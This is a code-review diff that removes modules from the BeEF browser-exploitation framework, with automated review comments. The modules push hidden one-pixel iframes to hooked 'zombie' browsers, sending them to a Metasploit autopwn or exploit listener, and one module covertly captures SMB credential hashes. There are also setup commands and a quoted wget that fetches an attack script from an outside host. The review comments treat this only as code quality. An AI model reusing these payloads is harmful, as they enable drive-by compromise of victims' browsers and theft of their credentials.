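Review bot: The line `sh -c 'cd /tmp; wget http://spl0it.org/files/msfautopwn.rb'` fetches a script over plain HTTP and the next line registers it as `AutoRunScript`, so whatever that URL serves at run time executes in the operator's Metasploit session with no integrity check, and the module page's `sudo ./msfconsole -r beef.rc` instruction runs it as root. /tmp is world-writable and the file name is fixed, so another local user can create that file first. Ship the script in the repository or verify a pinned checksum before use, and write it to a private directory.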


@@ -1,59 +0,0 @@
<?php
// Copyright (c) 2006-2010, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
//
// Module by: Joshua "Jabra" Abraham
// jabra@spl0it.org
// http://blog.spl0it.org
//
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
var rtnval = "Request Received";
function get_b64_code_request() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
// replace sections of the code with user input
b64code = b64replace(b64code, "MSF_IP",document.myform.msf_ip.value);
b64code = b64replace(b64code, "MSF_PORT",document.myform.msf_port.value);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Mozilla nsIProcess Interface', get_b64_code_request());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_request());
}
// add construct code to DOM
Element.addMethods();
</script>
<div id="module_header">Metasploit Browser Autopwn (Manual Setup)</div>
<div class="entry">
This exploit requires an RC file for Metasploit. Unlike the other Metasploit modules,
this one requires the manual setup of the autopwn module.<br><br>
Metasploit Autopwn RC File:<a href="../modules/browser/msf_autopwn/beef.rc"> beef.rc </a><br>
<pre>
sudo ./msfconsole -r beef.rc
</pre>
</div>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Metasploit Autopwn IP</div>
<input type="text" name="msf_ip" value="10.0.0.100"/>
<div id="module_subsection_header">Metasploit Autopwn Port</div>
<input type="text" name="msf_port" value="9000"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/><br>
</form>
</div>
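Review bot: `ar.enable('Mozilla nsIProcess Interface', ...)` carries the label of a different module, copied along with the boilerplate, so autorun for this page would be listed under the wrong name. Use this module's own name, "MSF Browser Autopwn (M)", as in its name file.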


@@ -1 +0,0 @@
MSF Browser Autopwn (M)


@@ -1,17 +0,0 @@
// iframe.setAttribute("style", "visibility:hidden;"); doesn't work with ie
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = 'http://MSF_IP:MSF_PORT/beef.html';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Request Sent";
}
var result_value = do_main();
return_result(result_id, result_value);


@@ -1,68 +0,0 @@
<?php
// Copyright (c) 2009, Ryan Linn (sussurro@happypacket.net)
// All Rights Reserved
// Template for code by:
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: the following is the boiler plate from the exploit
-->
<script language="javascript" type="text/javascript">
var rtnval = "OK Clicked";
Element.Methods.construct_code = function($url) {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
b64code = b64replace(b64code, "URL",$url);
// send the code to the zombies
do_send(b64code);
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Metasploit Browser Exploits</div>
This module creates a Metasploit listener using a backend server, and then sends the client
code which creates an iframe connecting to the waiting exploit.<br><br>
Setup MSF to allow BeEF access (settings in /beef/ui/msf.php):<br>
<pre>
sudo ./msfconsole
msf > load xmlrpc Pass=BeEFMSFPass
</pre>
<div id="module_subsection">
<form name="myform" id="myform">
<div id="module_subsection_header">Exploit</div>
<div id="exploits">
<select name="" id="loading" onChange="">
<option value="">Loading...</option>
</select>
</div>
<div id="module_subsection_header">Payload</div>
<div id="payloads">
<select name="" id="loading" onChange="">
<option value="">Loading...</option>
</select>
</div>
<div id="options">Loading...</div>
<input class="button" type="button" value=" Send Now " onClick="javascript:msf_execute_module()"/>
</form>
</div>
<script>
// init pane
msf_get_exploit_list();
</script>
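Review bot: Both placeholder `<select>` elements use `id="loading"`, and `id="module_subsection_header"` is repeated as well; ids must be unique within a document, and a lookup by id will only find the first match. Give the two selects distinct ids or turn the shared styling hooks into classes. The setup text also repeats the fixed `Pass=BeEFMSFPass` from the autopwn page; that block belongs in one shared include that tells the operator to set their own password.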


@@ -1 +0,0 @@
MSF Browser Exploit


@@ -1,14 +0,0 @@
// iframe.setAttribute("style", "visibility:hidden;"); doesn't work with ie
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = 'URL';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Launched Metasploit Module";
}
return_result(result_id, do_main());


@@ -1,65 +0,0 @@
<?php
// Copyright (c) 2009, Ryan Linn (sussurro@happypacket.net)
// All Rights Reserved
// Template for code by:
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: the following is the boiler plate from the exploit
-->
<script language="javascript" type="text/javascript">
var rtnval = "OK Clicked";
Element.Methods.construct_code = function($url) {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
b64code = b64replace(b64code, "URL",$url);
// send the code to the zombies
do_send(b64code);
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Metasploit SMB Challenge Theft</div>
This module launches a Metasploit listener that attempts to covertly steal SMB Challenge hashes. Once
the Metasploit module has been launched, the targeted zombies will be redirected to Metasploit to attempt
to capture credentials.<br><br>
Setup MSF to allow BeEF access (settings in /beef/ui/msf.php):<br>
<pre>
sudo ./msfconsole
msf > load xmlrpc Pass=BeEFMSFPass
</pre>
<div id="module_subsection">
<form name="myform" id="myform">
<div id="module_subsection_header">SRVHOST (Required)</div>
<input type="text" name="SRVHOST" value="0.0.0.0"/>
<div id="module_subsection_header">SRVPORT (Required)</div>
<input type="text" name="SRVPORT" value="8080"/>
<div id="module_subsection_header">URIPATH</div>
<input type="text" name="URIPATH" value="beef"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:msf_smb_challenge_capture()"/><br>
</form>
<div class="entry">
<br>
After a successful exploitation the results can be found:<br>
<a href=../cache/logfile>Captured hashes</a><br>
<a href=../cache/pwfile>Captured hashes (Cain &amp; Able format)</a>
</div>
</div>
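Review bot: The result links `../cache/logfile` and `../cache/pwfile` point at captured credential material stored under a web-served directory, and nothing on this page restricts who can fetch it. Keep those files outside the document root or behind the UI's authentication, and quote the `href` values, which are currently bare. "Cain & Able" should read "Cain & Abel".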


@@ -1 +0,0 @@
MSF SMB Challenge Theft


@@ -1,14 +0,0 @@
// iframe.setAttribute("style", "visibility:hidden;"); doesn't work with ie
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = 'URL';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Launched Metasploit SMB Credential Theft";
}
return_result(result_id, do_main());

Some files were not shown because too many files have changed in this diff